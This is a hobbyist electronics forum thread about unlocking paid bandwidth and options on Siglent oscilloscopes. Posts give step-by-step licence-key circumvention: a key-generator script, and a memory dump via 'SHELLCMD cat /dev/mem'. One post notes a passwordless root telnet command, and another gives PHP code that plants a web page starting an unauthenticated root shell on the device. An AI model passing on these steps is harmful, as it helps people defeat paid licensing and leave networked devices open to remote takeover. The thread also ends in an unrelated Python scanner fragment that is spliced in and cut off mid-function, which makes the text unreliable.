Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #136 on: October 25, 2019, 08:50:27 am »
the internal signal generator......
The sig gen is an additional external HW option, SAG1021.
Avid Rabid Hobbyist
 

Offline KaLi

  • Contributor
  • Posts: 10
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #137 on: October 25, 2019, 08:58:09 am »
Quote
The sig gen is an additional external HW option, SAG1021.

I had in my memory that one could upgrade to some kind of internal software function generator as one channel... and an additional hardware box as a second channel.

But I have to admit... I read all the specs and features of the possible "around 500€" oscilloscopes a year ago and may mix things up.

Writing this I checked the product page of the seller: SDS1000X-E-FG as software upgrade is needed in addition.
 

Online Rerouter

  • Super Contributor
  • ***
  • Posts: 4666
  • Country: au
  • Question Everything... Except This Statement
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #138 on: October 25, 2019, 09:04:21 am »
Nope, single external channel via AWG device; it is not a 2-channel sig-gen, that other BNC acts as a trigger in/out.

You can modulate 1 waveform with another, but not with external input.

For similar money you can buy an entry-level Siglent AWG device, and use that via USB instead for Bode plot.
« Last Edit: October 25, 2019, 09:07:31 am by Rerouter »
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #139 on: October 25, 2019, 09:05:32 am »
Quote
The sig gen is an additional external HW option, SAG1021.

I had in my memory that one could upgrade to some kind of internal software function generator as one channel... and an additional hardware box as a second channel.

But I have to admit... I read all the specs and features of the possible "around 500€" oscilloscopes a year ago and may mix things up.

Writing this I checked the product page of the seller: SDS1000X-E-FG as software upgrade is needed in addition.
Correct, to get AWG usage of SAG1021 you need the FG option once the free trial usages expire.
Avid Rabid Hobbyist
 

Offline KaLi

  • Contributor
  • Posts: 10
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #140 on: October 25, 2019, 09:28:47 am »
Quote
Correct, to get AWG usage of SAG1021 you need the FG option once the free trial usages expire.

Which is quite an interesting concept: selling a pricey black box without the software for using it. The simple Shenzhen 2ch function generator with its own display that I use for playing around costs less than half the price of that box (well: of course, I got the quality I paid for ;-).

All these options are nice to have... but not necessary... therefore, not an option to pay for. I wouldn't even need more than 50 MHz because of the scopes I have at work for those occasions.

So the question stays: The state of the hack? And I shouldn't have said this sentence to a board member with a "NZ Siglent Distributor" in his description ;-)
 

Offline KaLi

  • Contributor
  • Posts: 10
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #141 on: October 25, 2019, 09:30:31 am »
For similar money you can buy an entry level AWG siglent device, and use that via usb instead for bode plot

Which is my plan, if I buy a Siglent scope.
 

Online Rerouter

  • Super Contributor
  • ***
  • Posts: 4666
  • Country: au
  • Question Everything... Except This Statement
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #142 on: October 25, 2019, 09:54:14 am »
State of the hack: different method, but still works, just dig around a bit.

They are not opposed to us doing whatever we want with our hardware when we get it, they are opposed to remote vulnerabilities.
 

Offline KaLi

  • Contributor
  • Posts: 10
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #143 on: October 25, 2019, 10:16:42 am »
State of the hack: different method, but still works, just dig around a bit.

They are not opposed to us doing whatever we want with our hardware when we get it, they are opposed to remote vulnerabilities.

Good to read that. I'm not even sure that (if I buy that scope) I would use the hack. But to have "options" is a well respected bonus-feature in my decision making process.

So everything is open in the forum... and no PM is needed?
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #144 on: October 25, 2019, 06:43:13 pm »
Quote
Correct, to get AWG usage of SAG1021 you need the FG option once the free trial usages expire.

Which is a quite interesting concept of selling a pricey black-box without a software for using it.
Only the AWG functionality is optioned and SAG1021 gives free and unhindered use for Bode plot.

The best solution is to have a standalone AWG and the Siglent ones allow for seamless SDS1*04X-E connectivity for Bode plot use. They work in the same way as SAG1021 in that they are totally controlled by the scope's Bode plot feature.


Quote
And I shouldn't have said this sentence to a board member with a "NZ Siglent Distributor" in his description ;-)
Fear not, a good amount of my own Siglent equipment is 'improved'.  ;)
Avid Rabid Hobbyist
 

Offline MikeLud

  • Regular Contributor
  • *
  • Posts: 221
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #145 on: October 25, 2019, 10:10:24 pm »
Another option to a Siglent AWG that works with the scope's Bode Plot is in the link below:

https://www.eevblog.com/forum/testgear/siglent-sds1104x-e-and-sds1204x-e-bode-plot-with-non-siglent-awg/
 

Offline Sabagmn

  • Supporter
  • ****
  • Posts: 1
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #146 on: October 26, 2019, 07:40:00 am »
Hello

Could anyone share Plurn's workaround with me? Either by PM or email.
Thank you very much.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #147 on: October 26, 2019, 08:18:36 am »
Hello

Could anyone share Plurn's workaround with me? Either by PM or email.
Thank you very much.

Msg #105.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #148 on: October 26, 2019, 10:40:33 am »
Just after posting this, I thought a little and think one could easily patch the app to allow the scope to accept the 250 MHz and 300 MHz models.

That would be interesting to see how the FW/HW would react...   :-DD

Volunteers, opinions?   ;)
 

Offline tinhead

  • Super Contributor
  • ***
  • Posts: 1925
  • Country: 00
    • If you like my hacks, send me a donation
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #149 on: October 26, 2019, 03:47:44 pm »
Just after posting, I thought a little and think one could easily patch the app to allow the scope to accept the 250 MHz and 300 MHz models.

That would be interesting to see how the FW/HW would react...   :-DD

Volunteers, opinions?   ;)

I tested SDS1204X-E with generated license keys (250 and 300 models), got model name displayed, but in reality the DSO switched back to 70MHz model (~, based on risetime). Haven't tested 350 and 500MHz keys, but 750M / 1G (model name goes empty, SDS worked strangely unstable, after some playing had to restore nand, risetime as 70MHz model) and MAX key (lic key not accepted). I can't prove it anymore, but as I started to play with 300MHz lic, it was not accepted / model name not changed, till I applied once 1G lic key, rebooted, and 300MHz (so in principle made model empty with out of range/scope lic, and then 300MHz key). Since then, even after nand restore, I can use 300M lic key. So maybe real, or coincidence, or maybe I was too stoned as I tested it first time.
I don't want to be human! I want to see gamma rays, I want to hear X-rays, and I want to smell dark matter ...
I want to reach out with something other than these prehensile paws and feel the solar wind of a supernova flowing over me.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #150 on: October 26, 2019, 04:24:55 pm »
Sorry tin, but I didn't fully understand your answer.

But, I'm not saying to just license it to 250 or 300. One must patch the app so that those are recognized as possible options, then we should license it. Or did you do that also?

The FW hasn't support for licenses > 300 MHz so, any BW out of range should result in 70 MHz because this BW is the last in the list of possible BW values (as coded in the FW). My guess...
 

Offline tinhead

  • Super Contributor
  • ***
  • Posts: 1925
  • Country: 00
    • If you like my hacks, send me a donation
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #151 on: October 26, 2019, 04:54:23 pm »
Sorry tin, but I didn't fully understand your answer.

which part? :P

But, I'm not saying to just license it to 250 or 300. One must patch the app so that those are recognized as possible options, then we should license it. Or did you do that also?

No, I haven't. All I did was to play with keys and some fw option files (tried to force the app to work properly), but never tried to patch the app itself to get it working (as patch can't be simply updated). However, I'm here if you need a volunteer.

The FW hasn't support for licenses > 300 MHz so, any BW out of range should result in 70 MHz because this BW is the last in the list of possible BW values (as coded in the FW). My guess...

Right, everything accepted but not implemented (or not supported or blocked) defaults to 70M. Keys for 250 and 300M are working (model name/type), but not the bw. Keys > 300 and < MAX are unknown, so still 70M bw but this time no model type (few empty fields here and there, so nobody really knows how dangerous it is to use them. I had to reflash nand to get my SDS working again). The "MAX" key is not known for SDS1000X-E series (it is part of SDS5000).
I don't want to be human! I want to see gamma rays, I want to hear X-rays, and I want to smell dark matter ...
I want to reach out with something other than these prehensile paws and feel the solar wind of a supernova flowing over me.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #152 on: October 26, 2019, 05:23:06 pm »
1 - :D  (No need because this last answer cleared my doubts.)
2 - OK. I'll send you the info although another poweruser is also researching ATM.   ;D
3 - I confirm all that. And thanks for the warning although I would not suggest going beyond the 300M mark.

The "MAX" key is not known for SDS1000X-E series (it is part of SDS5000).

AFAIK only works on SDS2000X-E, not even SDS5000X !

Enables approx. 400 MHz.
« Last Edit: October 26, 2019, 06:38:06 pm by tv84 »
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #153 on: October 27, 2019, 02:39:02 pm »
Well, my theory is difficult to test with the new FW (that fuses a lot of Siglent's SDS), especially without a scope. So, let it rest...

BTW, the new SDS1xx4X-E_6.1.33 firmware is able to run on the following equipment (the FW includes their respective version!!!):

     Product Type      FW version
0 - SDS1002X-E         1.3.19
1 - SDS1004X-E         6.1.33
2 - SDS2000X-E         1.1.18
3 - SDS5000X           0.8.2R1
4 - SLA1016            8.1.9
5 - SDS2000X+          1.1.8
6 - ZODIAC-            1.0.0.0


Very interesting!
« Last Edit: October 27, 2019, 04:12:19 pm by tv84 »
 
The following users thanked this post: djadeski

Offline jemangedeslolos

  • Frequent Contributor
  • **
  • Posts: 355
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #154 on: October 27, 2019, 03:26:32 pm »
 :popcorn:
 

Offline aimc

  • Contributor
  • Posts: 22
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #155 on: October 31, 2019, 12:04:28 pm »
Kai, you won't need much of your Christmas holiday for this upgrade hack. It can be done within a few minutes :). All you have to do is to establish a network connection, run the Python code posted here with your scope ID, and paste the keys that are generated. You can also undo all changes that you have made to original specs. Let me know off the blog if you have more questions (I am German speaking too).
Cheers, Lutz
 

Offline KaLi

  • Contributor
  • Posts: 10
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #156 on: October 31, 2019, 02:33:31 pm »
Just bought a SDS1104X-E and already downloaded the Python script. But I have no need for more than 100 MHz for the moment, therefore I will play around with the "upgrade" in my holiday time. For that time I can borrow a good function generator and probes from my work to cross-check the advancements.

But for the first time I checked my (cheap) Feeltech FY6900/60 function generator I bought for Arduino datalogging experiments in summer... and the signal isn't as good as I expected. For the moment I have to read these threads to get some knowledge of what the nominal values should be.

And I have to look around in the threads in the forum to get some pictures of the "grounded" signals for the oscilloscope... my low V/DIV "flatline" readouts look kind of noisy.
 

Offline Hfe72

  • Newbie
  • Posts: 1
  • Country: aq
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #157 on: November 10, 2019, 10:28:24 am »
Hi all! I am newbie and I have some questions about updating my SDS1104X-E (Current FW is 6.1.26):

I have done a memory dump, but not yet activated WiFi, 200 MHz etc. So should I first upgrade FW to 6.1.33, and next install Plurn's .ads file from a USB stick? And what is the Python file, I can't find it?

Could someone please send me more detailed instructions on the upgrade via PM?

Thanks



« Last Edit: November 11, 2019, 11:47:26 am by Hfe72 »
 

Offline aimc

  • Contributor
  • Posts: 22
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #158 on: November 13, 2019, 08:07:41 pm »
Hi all! I am newbie and I have some questions about updating my SDS1104X-E (Current FW is 6.1.26):

I have done a memory dump, but not yet activated WiFi, 200 MHz etc. So should I first upgrade FW to 6.1.33, and next install Plurn's .ads file from a USB stick? And what is the Python file, I can't find it?

Could someone please send me more detailed instructions on the upgrade via PM?

Thanks

Well, I had my fair share of mishaps, but now I can say with confidence that everything is quite trivial. Here is what worked for me:

1) I updated to 6.1.33 but as I understood from others you don't have to. All license changes will be persistent after FW changes.
2) Connect your scope to your local network and write down the IP address. You can also use the USB if you don't have LAN, in this case skip to (4).
3) Use IE or other browser from a PC in that LAN simply by the IP address (http://xxx.yyy.zzz.aaa).
4) Your scope answers you with a web page containing 4 big buttons on the left, push the bottom (SCPI control) one.
5) In the command line enter SCOPEID? and receive your scope ID in the text window below, write it down, remove the dashes.
6) Have your scope's serial number ready. Get it from either your cal sheet or from the scope Info button, or finally via SCPI command *IDN? (it returns comma-separated model, SN, SW version)
7) Get the updated (!) Python code from here: (The updated link from wgoeo goes to a website that can also run the code).

I haven't fully tested this but the output matches the bandwidth keys in reply #89.
Needs Python 3, just replace the serial and run.

Edit: Update, thanks tinhead!

8) Enter the 16-character Scope ID (remove the dashes in between!) and the 14-character serial number in the corresponding placeholders of the py-code file.
9) Run the Python code, either on your PC if you have PyCharm or Visual Studio or find an online Python engine where you can paste the patched py code and run it. Simplest is to just run it off the website provided by wgoeo. There you can also paste your ID/SN in.
10) Pick the keys relevant for the SDS1000X-E from the result (100M, 200M, AWG, WIFI, MSO).
11) Go back to the SCPI terminal and install the bandwidth key with MCBD <key> (e.g. MCBD 0123456789ABCDEF). You can see whether the key was taken with MCBD?: the same key you just entered then appears in the result window. You can also see instantly that the scope has now changed model number. (No scope restart is needed, the result is immediate. You even see the change in noise when in the 0.5mV range with nothing connected).
12) Now install the SW options. On the SCPI use LCISL <option> <key> (Option AWG, WIFI, MSO), (e.g. LCISL WIFI 0123456789ABCDE). I used the scope's function to enter the key: under Utilities, Options, on one of the pages select one of the three options and press the install button to enter the key; the scope will answer "License key installed" (make sure the key is correct, I fell victim to my own handwriting and almost gave up until I noticed that I mistook Z for a 2  |O ).
13) Although changes are immediate, for sanity reboot the scope and do a calibration.
14) Congratulations you are done. Don't forget to thank wgoeo and tinhead.

cheers
Lutz
 
The following users thanked this post: m12lrpv, patman27, 5370H55V, thaistatos, Manx, Sinatek, Hfe72, jlo

Offline 5370H55V

  • Contributor
  • Posts: 14
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #159 on: November 15, 2019, 11:01:50 pm »

Well, I had my fair share of mishaps, but now I can say with confidence that everything is quite trivial. Here is what worked for me:

1) I updated to 6.1.33 but as I understood from others you don't have to. All license changes will be persistent after FW changes.
2) Connect your scope to your local network and write down the IP address. You can also use the USB if you don't have LAN, in this case skip to (4).
3) Use IE or other browser from a PC in that LAN simply by the IP address (http://xxx.yyy.zzz.aaa).
4) Your scope answers you with a web page containing 4 big buttons on the left, push the bottom (SCPI control) one.
5) In the command line enter SCOPEID? and receive your scope ID in the text window below, write it down, remove the dashes.
6) Have your scope's serial number ready. Get it from either your cal sheet or from the scope Info button, or finally via SCPI command *IDN? (it returns comma-separated model, SN, SW version)
7) Get the updated (!) Python code from here: (The updated link from wgoeo goes to a website that can also run the code).

I haven't fully tested this but the output matches the bandwidth keys in reply #89.
Needs Python 3, just replace the serial and run.

Edit: Update, thanks tinhead!

8) Enter the 16-character Scope ID (remove the dashes in between!) and the 14-character serial number in the corresponding placeholders of the py-code file.
9) Run the Python code, either on your PC if you have PyCharm or Visual Studio or find an online Python engine where you can paste the patched py code and run it. Simplest is to just run it off the website provided by wgoeo. There you can also paste your ID/SN in.
10) Pick the keys relevant for the SDS1000X-E from the result (100M, 200M, AWG, WIFI, MSO).
11) Go back to the SCPI terminal and install the bandwidth key with MCBD <key> (e.g. MCBD 0123456789ABCDEF). You can see whether the key was taken with MCBD?: the same key you just entered then appears in the result window. You can also see instantly that the scope has now changed model number. (No scope restart is needed, the result is immediate. You even see the change in noise when in the 0.5mV range with nothing connected).
12) Now install the SW options. On the SCPI use LCISL <option> <key> (Option AWG, WIFI, MSO), (e.g. LCISL WIFI 0123456789ABCDE). I used the scope's function to enter the key: under Utilities, Options, on one of the pages select one of the three options and press the install button to enter the key; the scope will answer "License key installed" (make sure the key is correct, I fell victim to my own handwriting and almost gave up until I noticed that I mistook Z for a 2  |O ).
13) Although changes are immediate, for sanity reboot the scope and do a calibration.
14) Congratulations you are done. Don't forget to thank wgoeo and tinhead.

cheers
Lutz

Thanks, the steps worked for me and after some hiccups I got both the bandwidth and options loaded. :D

I had some difficulty following the instruction for using USB to connect directly and had to figure it out myself. Turns out you need to install NI MAX and EasyScopeX from Siglent first in order for the scope to be detected properly when it's connected. Once it is, you can then use the terminal window in EasyScope to input the commands as described from step 5 onwards.

Also wanted to add that changing the bandwidth through the terminal worked, but unlocking the options didn't (although LAN users might not have this problem). For that I had to select the option (AWG, WIFI, MSO) with the scope buttons and unlock it by manually inputting the key on the scope itself.
 

Offline Omniata

  • Newbie
  • Posts: 1
  • Country: gb
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #160 on: December 28, 2019, 11:43:52 pm »
I'd just like to confirm the hack works on the SDS2202X-E, for the AWG, MSO and WIFI options, although, I had to use the codes generated from the webpage/script and input them manually on the scope.
I bought a TP-LINK WN725N adaptor off Amazon, plugged it in and WIFI working with no countdown.

Now I need a hack to make my own MSO/16-bit logic interface, it looks like an HDMI socket, but I'm not 100% sure.
ex ovo omnia...
 

Offline Calvin

  • Regular Contributor
  • *
  • Posts: 110
  • Country: de
    • Calvin´s audio page
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #161 on: December 29, 2019, 09:09:14 am »
Hi,

owning a SDS1204X-E I just wanted to unlock the other options.
Using the py script from the above-linked wgoeo's website one only needs the serial no. of the scope.
No need to hook up the scope via USB or LAN.
The scope ID is only required for bandwidth unlocking.
Just replace the string for the serial-no. and run the script and put in the codes manually.

regards
Calvin
..... it builds character!
 

Offline Madcat129

  • Newbie
  • Posts: 1
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #162 on: February 13, 2020, 08:26:55 am »
I recently picked up this new scope and "upgraded" it to SDS1204X-E with 200MHz with AWG, WIFI and MSO and have been having quite a few problems with crashing and bootlooping at the logo screen. Has anyone experienced any of these issues or is it related to my scope?
 

Offline Steve8080

  • Newbie
  • Posts: 1
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #163 on: February 29, 2020, 12:11:46 am »
did you ever solve it?
 

Offline dropkick

  • Contributor
  • Posts: 38
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #164 on: February 29, 2020, 01:59:57 am »
Did the full SDS1104X-E to SDS1204X-E "upgrade", BW and all options, two weeks ago now. v6.1.33 before and after.  No worries whatsoever.  :-+
 

Offline ArcticPhoenix0

  • Contributor
  • Posts: 34
  • Country: us
  • If it looks like I know what I'm doing, just wait.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #165 on: March 07, 2020, 02:35:11 pm »
I get a memdump file but it's 0 bytes.
All the necessary information is here and was found by others (thanks to them :-+).
To summarize, I put what I use below (English and French). I use the memory dump technique, which works very well and avoids flashing an alternative firmware.

English:
All of this only works with firmware <= 6.1.26; from firmware 6.1.33 the SHELLCMD is deactivated. But you can downgrade the scope to 6.1.26 to find the keys and afterwards upgrade it to the latest version.
  • Have a USB stick that is recognized by the oscilloscope (save a screenshot to it to check)
  • Connect to the oscilloscope with the web interface
  • In the SCPI tab, send the command SCOPEID? and note the result, it is like wwww-xxxx-yyyy-zzzz
  • Send the command *IDN? to get the serial number like SDSxxxxxxxxxxxx
  • Send the command SHELLCMD cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump.bin
  • Wait a while for this command to finish (we will say 1 min, there is 240MB to write on the USB stick)
  • Put the USB stick in a computer, there must be a file memdump.bin
  • Open this file in a hex editor (I use HxD on Windows)
  • Find your SCOPEID without the - (so wwwwxxxxyyyyzzzz)
  • Just before it there must be a 100M (or 200M, depending on your oscilloscope), which is the active bandwidth, and a little further (37 characters) above, SDS1000X-E
  • A little lower (116 characters) there must be letters, in fact 2 groups of 16 characters and one of 32 characters (that we cut in half), which makes 4 groups of 16 characters corresponding to the key to activate the bandwidth option (respectively 100MHz, 200MHz, 50MHz, 70MHz)
  • To activate the corresponding license it is necessary to send the SCPI command MCBD key and to turn the scope off and on again
  • Start again from the beginning of the file and look for your serial number (SDSxxxxxxxxxxxx), searching until you find the one where MSO is written 5 characters before
  • A little lower (69 or 117 characters) there is a group of readable characters; there are 3 groups of 16 characters which correspond to the activation key of the options; if this key appears 2 times, it is already active. The options are respectively (AWG, WIFI, MSO) and can be activated with the SCPI command LCISL option,key
An interesting SCPI command to explore the scope (be careful not to brick it), SHELLCMD telnetd -l/bin/sh -p9999 opens a telnet (root shell) without password.

French:
All of this only works with a firmware <= 6.1.26; from firmware 6.1.33 onwards the SHELLCMD command has been disabled. But you can downgrade your oscilloscope to firmware 6.1.26 to find the keys, then put the latest firmware back on.
  • Have a USB stick that is recognized by the oscilloscope (save a screenshot to it to check)
  • Connect to the oscilloscope with the web interface
  • In the SCPI tab, send the command SCOPEID? and note the result; it has the form wwww-xxxx-yyyy-zzzz
  • Send the command *IDN? to get the serial number in the form SDSxxxxxxxxxxxx
  • Send the command SHELLCMD cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump.bin
  • Wait some time for this command to finish (say 1 min, there is 240 MB to write to the USB stick)
  • Put the USB stick in a computer; there must be a file memdump.bin
  • Open this file in a hex editor (I use HxD on Windows)
  • Search for your SCOPEID without the - (so wwwwxxxxyyyyzzzz)
  • Just before it there must be a 100M (or 200M, depending on your oscilloscope), which is the active bandwidth, and a little further (37 characters) above, SDS1000X-E
  • A little lower (116 characters) there must be letters, in fact 2 groups of 16 characters and one of 32 characters (which is cut in two), which gives 4 groups of 16 characters corresponding to the key to activate the bandwidth option (respectively 100MHz, 200MHz, 50MHz, 70MHz)
  • To activate the corresponding license you must send the SCPI command MCBD key and turn the scope off and on again
  • Go back to the start of the file and search for your serial number (SDSxxxxxxxxxxxx), searching until you find the one where MSO is written 5 characters before
  • A little lower (69 or 117 characters) there is a group of readable characters; there are 3 groups of 16 characters which correspond to the activation key of the options; if this key appears twice, it is already active. The options are respectively (AWG, WIFI, MSO) and can be activated with the SCPI command LCISL option,key
An interesting SCPI command for exploring the oscilloscope (be careful not to break everything), SHELLCMD telnetd -l/bin/sh -p9999 opens telnet access (root shell) without a password.
 

Offline ArcticPhoenix0

  • Contributor
  • Posts: 34
  • Country: us
  • If it looks like I know what I'm doing, just wait.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #166 on: March 08, 2020, 12:14:40 am »
Now that I've unlocked my Siglent 1104X-E to a 1204X-E, what passive probe upgrade do you recommend? Looking to try to keep it under $30 per probe.
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #167 on: March 08, 2020, 12:26:58 am »
Now that I've unlocked my Siglent 1104X-E to a 1204X-E, what passive probe upgrade do you recommend? Looking to try to keep it under $30 per probe.
None.
PP510 probes are within 1 dB of PP215 probes to 200+ MHz.

Otherwise take your pick here:
https://siglentna.com/products/accessories/probes/passive-probes/
« Last Edit: May 05, 2020, 07:21:16 pm by tautech »
Avid Rabid Hobbyist
 
The following users thanked this post: patman27

Offline spy

  • Contributor
  • Posts: 6
  • Country: pl
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #168 on: April 13, 2020, 07:14:12 pm »
Well, I did "improve" my device as well, and here is my small feedback. The key for 200MHz bandwidth generated on the website https://repl.it/repls/GainsboroAlienatedText doesn't work. At least it didn't work for me. Mem dump was necessary. On the other hand, web-generated keys for options do work. One can apply them either via the Utility menu or the web interface (SCPI tab).

EDIT: codes generated from this link work (even for 200MHz bandwidth): https://repl.it/repls/JauntyAccurateGraphics . I don't know why it didn't work from the previous one and I don't have time to investigate. Just generate it and you can skip 1-8 from the following guide. However, if you need telnet for some reason, you still have to downgrade the firmware in your device.

A slightly revised how-to and some additions:

1.   Make sure your oscilloscope is flashed with fw 6.1.26 (6.1.33 and above have some commands disabled)
2.   Insert USB stick and make sure it is detected by the oscilloscope.
3.   Connect to the oscilloscope with the web interface (via LAN or WiFi).
4.   In the SCPI tab send the command MCBD? and note the result.
5.   In the SCPI tab send the command SHELLCMD cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump.bin and wait until it is stored on your USB stick (15 seconds should be enough).
6.   Copy the memdump.bin file to your computer and open it with your favorite text editor (Notepad is just fine, the simpler the better).
7.   Find in your memdump.bin file the 16-character string from the MCBD? command (in fact it is a 100MHz license key)
8.   Right next to the 100MHz key you just found there is a 200MHz unlock key, and a bit lower there are keys for oscilloscope options. Each one is a 16-character key. Please note, AWG, WiFi and MSO keys are stored as one string and have to be split (take a look at the picture in attachment).
9.   In the SCPI tab send the command LCISL option,key (no reboot is required, you can see the result immediately by pressing "Utility->Options->Information" on your oscilloscope)
10. In the SCPI tab send the command MCBD 200MHzKey. Turning off/on the oscilloscope is NOT required to start using new bandwidth, you should see changes in waveform on oscilloscope screen immediately. Double check if oscilloscope has accepted the bandwidth key by sending SCPI command MCBD? - the 200MHz key should be returned as a result - or verify if oscilloscope introduces itself as SDS2104X-E (either via SCPI tab on webpage or by using the Utility menu). You can flash your oscilloscope to the latest firmware now (bandwidth and options keys will stay active) or keep reading this post...
11. It is good practice to write down your keys (even 100MHz if you would like to revert your changes by sending SCPI command MCBD 100MHzKey, re-enabling 200MHz bandwidth will be still possible) and even keep the memdump file.

If you're familiar with the linux console you can take advantage of the following information:

12. /usr/bin/siglent/firmdata0/NSP_system_info.xml is where your oscilloscope serial number and MAC is stored
13. /usr/bin/siglent/firmdata0/bandwidth.txt is where your bandwidth license is stored.
14. Option license key is stored in i.e.  /usr/bin/siglent/firmdata0/options_wifi_license.txt
15. Startup counter is stored in /usr/bin/siglent/usr/config/NSP_usr_system_info.xml
16. Options usage counters are stored in /usr/bin/siglent/usr/usr/options_$option$_times.txt. Seems like the device has 1153b, i2s, CAN and flx options factory activated.
17. Looking at /lib/firmware/ you can come to conclusion that any WiFi dongle based on mt7601u, rt2870 or rtl8188eu should be supported by the oscilloscope. However most likely modules are loaded from /usr/bin/siglent/drivers and there is a driver for mt7601u only. It is possible to build your own driver using kernel 3.19.0 and xilinx BSP and upload it to this directory to i.e. unlock possibility to connect to 5GHz WiFi network using different dongle.
18. After flashing to fw newer than 6.1.26 SCPI SHELLCMD is no longer supported. To keep the possibility to explore your oscilloscope via telnet you can mount -o rw,remount /usr/bin/siglent then go ahead with vi /usr/bin/siglent/config/www/telnetd.php and paste following code (no, I'm not a PHP developer, sorry for the code quality):
Code: [Select]
<?php
// /usr/bin/siglent/config/www/telnetd.php
$port = 9999;
print "Checking for telnet daemon on port $port : ";
echo ($output = shell_exec("[[ \"$( ps | grep  ".$port." | grep -v grep )\" ]] && echo \"RUNNING\" || echo \"NOT STARTED\"")), "<br />";
// strncmp() returns non-zero when the output does not start with "RUNNING"
if (strncmp($output, "RUNNING", 7)) {
 print "Starting telnetd... ";
 shell_exec("telnetd -l/bin/sh -p'".$port."'");
 echo (shell_exec("[[ \"$(ps | grep  ".$port." | grep -v grep)\" ]] && echo \"SUCCESS\" || echo \"FAILED\"")), "<br />";
}
system("ps ax | grep  '".$port."' | grep -v grep");
?>

From now on http://oscilloscope_IP/telnetd.php will start the telnet daemon in your oscilloscope, until Siglent disables that possibility with a future firmware update. You can take a step further to modify /usr/bin/siglent/config/www/welcome.php by adding:

Code: [Select]
<div class="div-inline2 aboutlink" style="display:none">
            <a target="_blank"  class="about_link" href="telnetd.php">Start telnetd</a>
</div>

at the end of class="side_bar" and have it available from the oscilloscope's main web page.

0000. Keep in mind you should make backup of every file you modify. Playing with root privileges on rw mounted file-system is also a bit dangerous, so be careful to not brick your oscilloscope. Don't mess up if you're not familiar with linux.
 


« Last Edit: May 23, 2020, 03:41:26 pm by spy »
 
The following users thanked this post: stigwurx, patman27
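Added example, not part of spy's post and not Siglent code: the telnetd started above listens on port 9999 and hands out a root shell with no login, so anyone running these scopes on a shared bench network may want to confirm it has not been left running. The sketch below strips the telnet negotiation bytes from whatever a listener sends on connect and classifies the remaining banner; the function names, the sample captures and the prompt patterns (a typical BusyBox-style `# ` prompt versus a `login:` prompt) are assumptions made for illustration.

```python
import re
import socket
import sys

IAC, SE, SB = 0xFF, 0xF0, 0xFA
NEGOTIATION = {0xFB, 0xFC, 0xFD, 0xFE}  # WILL, WONT, DO, DONT: one option byte follows

# Assumed prompt shapes; adjust to what your own devices print.
AUTH_RE = re.compile(rb"(login|username|password)\s*:\s*$", re.I)
SHELL_RE = re.compile(rb"[#$]\s?$")

# Constructed sample captures (not taken from a real device).
SAMPLE_OPEN_SHELL = b"\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03\r\n/ # "
SAMPLE_LOGIN = b"\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03\r\nscope login: "


def strip_telnet(raw: bytes) -> bytes:
    """Remove telnet IAC command sequences, keeping only the text the peer sent."""
    out = bytearray()
    i, n = 0, len(raw)
    while i < n:
        b = raw[i]
        if b != IAC:
            out.append(b)
            i += 1
        elif i + 1 >= n:                 # truncated command at end of capture
            break
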